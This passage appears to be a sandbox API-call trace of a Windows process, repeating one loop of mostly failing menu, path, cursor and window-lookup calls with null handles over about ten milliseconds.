(hMenu=0x0, nPos=-1) returned 0x0 [0027.586] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.586] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.586] GetStockObject (i=6) returned 0x1b00018 [0027.586] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.586] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.586] PathFileExistsW (pszPath=0x0) returned 0 [0027.586] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.586] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.586] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.586] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.586] GetMenu (hWnd=0x0) returned 0x0 [0027.586] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.586] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.586] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.586] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.586] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.586] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.586] GetStockObject (i=6) returned 0x1b00018 [0027.586] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.586] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.586] PathFileExistsW (pszPath=0x0) returned 0 [0027.586] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.586] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.586] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.586] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.587] GetMenu (hWnd=0x0) returned 0x0 [0027.587] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.587] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.587] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.587] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.587] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.587] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.587] GetStockObject (i=6) returned 0x1b00018 [0027.587] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.587] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.587] PathFileExistsW (pszPath=0x0) returned 0 [0027.587] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.587] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.587] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.587] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.587] GetMenu (hWnd=0x0) returned 0x0 [0027.587] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.587] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.587] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.587] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.587] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.587] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.587] GetStockObject (i=6) returned 0x1b00018 [0027.587] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.587] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.587] PathFileExistsW (pszPath=0x0) returned 0 [0027.587] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.587] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.587] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.587] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.587] GetMenu (hWnd=0x0) returned 0x0 [0027.587] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x391) returned -1 [0027.587] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.588] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.588] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.588] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.588] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.588] GetStockObject (i=6) returned 0x1b00018 [0027.588] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.588] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.588] PathFileExistsW (pszPath=0x0) returned 0 [0027.588] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.588] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.588] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.588] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.588] GetMenu (hWnd=0x0) returned 0x0 [0027.588] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.588] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.588] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.588] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.588] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.588] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.588] GetStockObject (i=6) returned 0x1b00018 [0027.588] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.588] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.588] PathFileExistsW (pszPath=0x0) returned 0 [0027.588] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.588] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.588] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.588] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.588] GetMenu (hWnd=0x0) returned 0x0 [0027.588] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.588] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.588] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.588] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.588] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.589] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.589] GetStockObject (i=6) returned 0x1b00018 [0027.589] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.589] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.589] PathFileExistsW (pszPath=0x0) returned 0 [0027.589] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.589] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.589] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.589] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.589] GetMenu (hWnd=0x0) returned 0x0 [0027.589] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.589] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.589] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.589] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.589] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.589] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.589] GetStockObject (i=6) returned 0x1b00018 [0027.589] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.589] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.589] PathFileExistsW (pszPath=0x0) returned 0 [0027.589] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.589] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.589] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.589] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.589] GetMenu (hWnd=0x0) returned 0x0 [0027.589] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.590] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.590] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.590] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.590] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.590] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.590] GetStockObject (i=6) returned 0x1b00018 [0027.590] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.590] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.590] PathFileExistsW (pszPath=0x0) returned 0 [0027.590] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.590] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.590] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.590] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.590] GetMenu (hWnd=0x0) returned 0x0 [0027.590] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3c1) returned -1 [0027.590] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.590] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.590] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.590] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.590] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.590] GetStockObject (i=6) returned 0x1b00018 [0027.590] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.590] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.590] PathFileExistsW (pszPath=0x0) returned 0 [0027.590] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.591] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.591] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.591] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.591] GetMenu (hWnd=0x0) returned 0x0 [0027.591] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.591] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.591] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.591] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.591] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.591] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.591] GetStockObject (i=6) returned 0x1b00018 [0027.591] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.591] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.591] PathFileExistsW (pszPath=0x0) returned 0 [0027.591] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.591] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.591] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.591] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.591] GetMenu (hWnd=0x0) returned 0x0 [0027.591] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.591] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.591] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.591] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.591] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.591] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.591] GetStockObject (i=6) returned 0x1b00018 [0027.591] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.591] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.591] PathFileExistsW (pszPath=0x0) returned 0 [0027.591] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.591] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.591] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.591] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.592] GetMenu (hWnd=0x0) returned 0x0 [0027.592] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.592] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.592] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.592] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.592] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.592] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.592] GetStockObject (i=6) returned 0x1b00018 [0027.592] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.592] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.592] PathFileExistsW (pszPath=0x0) returned 0 [0027.592] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.592] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.592] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.592] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.592] GetMenu (hWnd=0x0) returned 0x0 [0027.592] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.592] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.592] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.592] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.592] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.592] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.592] GetStockObject (i=6) returned 0x1b00018 [0027.592] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.592] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.592] PathFileExistsW (pszPath=0x0) returned 0 [0027.592] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.592] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.592] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.592] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.592] GetMenu (hWnd=0x0) returned 0x0 [0027.592] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3d3) returned -1 [0027.592] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.592] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.593] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.593] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.593] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.593] GetStockObject (i=6) returned 0x1b00018 [0027.593] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.593] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.593] PathFileExistsW (pszPath=0x0) returned 0 [0027.593] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.593] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.593] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.593] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.593] GetMenu (hWnd=0x0) returned 0x0 [0027.593] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.593] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.593] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.593] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.593] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.593] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.593] GetStockObject (i=6) returned 0x1b00018 [0027.593] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.593] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.593] PathFileExistsW (pszPath=0x0) returned 0 [0027.593] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.593] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.593] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.593] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.593] GetMenu (hWnd=0x0) returned 0x0 [0027.593] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.593] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.593] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.593] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.593] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.593] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.593] GetStockObject (i=6) returned 0x1b00018 [0027.594] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.594] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.594] PathFileExistsW (pszPath=0x0) returned 0 [0027.594] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.594] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.594] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.594] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.594] GetMenu (hWnd=0x0) returned 0x0 [0027.594] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.594] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.594] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.594] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.594] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.594] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.594] GetStockObject (i=6) returned 0x1b00018 [0027.594] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.594] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.594] PathFileExistsW (pszPath=0x0) returned 0 [0027.594] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.594] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.594] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.594] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.594] GetMenu (hWnd=0x0) returned 0x0 [0027.594] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.594] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.594] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.594] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.594] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.594] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.594] GetStockObject (i=6) returned 0x1b00018 [0027.594] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.594] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.594] PathFileExistsW (pszPath=0x0) returned 0 [0027.594] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.595] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.595] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.595] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.595] GetMenu (hWnd=0x0) returned 0x0 [0027.595] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x530) returned -1 [0027.595] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.595] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.595] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.595] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.595] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.595] GetStockObject (i=6) returned 0x1b00018 [0027.595] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.595] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.595] PathFileExistsW (pszPath=0x0) returned 0 [0027.595] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.595] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.595] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.595] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.595] GetMenu (hWnd=0x0) returned 0x0 [0027.595] 